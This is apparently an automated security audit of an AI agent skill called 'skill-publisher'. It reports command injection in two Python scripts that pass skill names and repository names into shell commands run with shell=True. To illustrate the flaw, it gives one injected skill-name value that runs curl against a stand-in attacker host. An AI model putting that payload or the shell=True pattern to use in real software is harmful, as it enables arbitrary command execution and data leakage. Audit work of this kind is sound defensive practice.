skill-publisher

Fail

Audited by Gen Agent Trust Hub on Mar 25, 2026

Risk Level: HIGH
COMMAND_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION]: Arbitrary command execution vulnerability in scripts/add_skill.py via untrusted data. The script extracts the 'name' and 'description' fields from the YAML frontmatter of a target skill's SKILL.md file. These values are then interpolated directly into shell command strings (e.g., git add {skill_name} and git commit -m "添加 {skill_name} skill") which are executed with shell=True. An attacker providing a skill with a name like "myskill; curl http://attacker.com/$(whoami); #" would trigger execution of the injected command when the publisher skill is used.
  • [COMMAND_EXECUTION]: Command injection risk in scripts/init_repo.py. The script accepts a repository name as a command-line argument and interpolates it into a complex shell command for the GitHub CLI (gh repo create {repo_name} ...). Because the script uses shell=True, a malicious repository name could execute arbitrary commands on the host system.
  • [COMMAND_EXECUTION]: Insecure use of subprocess.run with shell=True. Both utility scripts in the skill run standard git and GitHub operations through a shell instead of passing argument arrays. This bypasses the protection that argument arrays provide (each argument is passed to the program verbatim, with no shell parsing) and creates a direct path to command injection whenever the interpolated data is not strictly controlled by the script itself.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Mar 25, 2026, 06:20 PM